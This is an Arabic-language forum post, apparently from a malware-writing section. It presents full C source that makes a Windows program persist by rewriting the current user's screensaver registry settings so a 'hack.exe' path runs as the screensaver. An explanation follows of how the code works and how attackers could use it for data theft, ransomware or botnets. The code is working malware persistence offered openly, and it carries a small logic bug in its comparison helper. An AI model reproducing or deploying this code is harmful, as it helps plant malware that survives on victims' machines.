x32x01
  • بواسطة x32x01 ||
البرمجية اللي قدامنا دي بتستخدم طريقة خبيثة علشان تثبت نفسها على نظام ويندوز بشكل دائم عن طريق تغيير إعدادات الـScreensaver (شاشة التوقف).
الكود مكتوب بلغة C وبيستخدم Windows API للتعامل مع مفاتيح الريجستري

C:
#include <windows.h>
#include <string.h>

int reg_key_compare(HKEY hKeyRoot, char* lpSubKey, char* regVal, char* compare) {
  HKEY hKey = nullptr;
  LONG ret;
  char value[1024];
  DWORD size = sizeof(value);
  ret = RegOpenKeyExA(hKeyRoot, lpSubKey, 0, KEY_READ, &hKey);
  if (ret == ERROR_SUCCESS) {
    RegQueryValueExA(hKey, regVal, NULL, NULL, (LPBYTE)value, &size);
    if (ret == ERROR_SUCCESS) {
      if (strcmp(value, compare) == 0) {
        return TRUE;
      }
    }
  }
  return FALSE;
}

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;
  // malicious app
  const char* exe = "Z:\\2022-04-26-malware-pers-2\\hack.exe";
  // timeout
  const char* ts = "10";
  // activation
  const char* aact = "1";

  // startup
  LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)"Control Panel\\Desktop", 0 , KEY_WRITE, &hkey);
  if (res == ERROR_SUCCESS) {
    // create new registry keys
    RegSetValueEx(hkey, (LPCSTR)"ScreenSaveActive", 0, REG_SZ, (unsigned char*)aact, strlen(aact));
    RegSetValueEx(hkey, (LPCSTR)"ScreenSaveTimeOut", 0, REG_SZ, (unsigned char*)ts, strlen(ts));
    RegSetValueEx(hkey, (LPCSTR)"SCRNSAVE.EXE", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
    RegCloseKey(hkey);
  }
  return 0;
}

شرح الكود:
1. دالة reg_key_compare:
- بتفتح مفتاح ريجيستري محدد وتقارن قيمته بمدخل معين.
- لو القيمة كانت متطابقة بترجع TRUE (صح)، ولو مش متطابقة أو حصل خطأ بترجع FALSE (غلط).

2. الدالة main:
- أول حاجة بتحدد بعض المتغيرات زي مسار البرنامج الخبيث اللي هو "hack.exe"، ووقت التايم آوت، وتفعيل الـScreensaver.
- بتحاول تفتح مفتاح الريجيستري الخاص بإعدادات الـScreensaver في المسار HKEY_CURRENT_USER\Control Panel\Desktop.
- لو نجحت في فتح المفتاح، بتغير ثلاث قيم:
- ScreenSaveActive: تفعيل الـScreensaver.
- ScreenSaveTimeOut: وقت التايم آوت للـScreensaver.
- SCRNSAVE.EXE: مسار البرنامج اللي هيشتغل كـScreensaver، وفي الحالة دي هو البرنامج الخبيث "hack.exe".
- في الآخر بتقفل مفتاح الريجسترى

مدى الخطورة والضرر:
تثبيت دائم: الكود ده بيسمح للبرنامج الخبيث إنه يثبت نفسه بشكل دائم على الجهاز، يعني كل ما الـScreensaver يشتغل، البرنامج الخبيث هيتنفيذ أوتوماتيكي
بمجرد إن شاشة التوقف تتفعل، البرنامج الخبيث هيبدأ يشتغل أوتوماتيكي

إخفاء النشاط باستخدام الـScreensaver، البرمجية ممكن تخفي نشاطها لأنها بتستخدم وظيفة موجودة أصلًا

ماذا يمكن أن يفعل بها الهكر
ممكن يبرمج "hack.exe" علشان يسرق بيانات من الجهاز زي كلمات المرور أو ملفات حالسيطرة على النظام
ممكن ينزل برامج إضافية أو يتحكم في الجهاز بتنفذ هجمات أخرى
البرمجية الخبيثة دي ممكن تكون جزء من هجوم أكبر زي هجمات الفدية أو شبكات الـBotnet.

ببساطة، الكود ده بيسمح للهكر بإنه يثبت برنامج خبيث على نظام ويندوز ويشغله كل مرة شاشة التوقف تتفعل، وده بيخلي النظام في خطر كبير لو المستخدم مش واخد باله.
 

المشاركات المتشابهة

x32x01
الردود
0
المشاهدات
15
x32x01
x32x01
x32x01
  • x32x01
الردود
0
المشاهدات
11
x32x01
x32x01
x32x01
الردود
0
المشاهدات
38
x32x01
x32x01
x32x01
الردود
0
المشاهدات
10
x32x01
x32x01
x32x01
الردود
0
المشاهدات
54
x32x01
x32x01
الوسوم : الوسوم
برمجة الفيروسات برمجة سكريبت صناعة الفيروسات

الدخول أو التسجيل السريع

نسيت كلمة مرورك؟

آخر المشاركات

أحدث المنتجات

إحصائيات المنتدى

المواضيع
1,600
المشاركات
1,787
أعضاء أكتب كود
193
أخر عضو
HAa
عودة
أعلى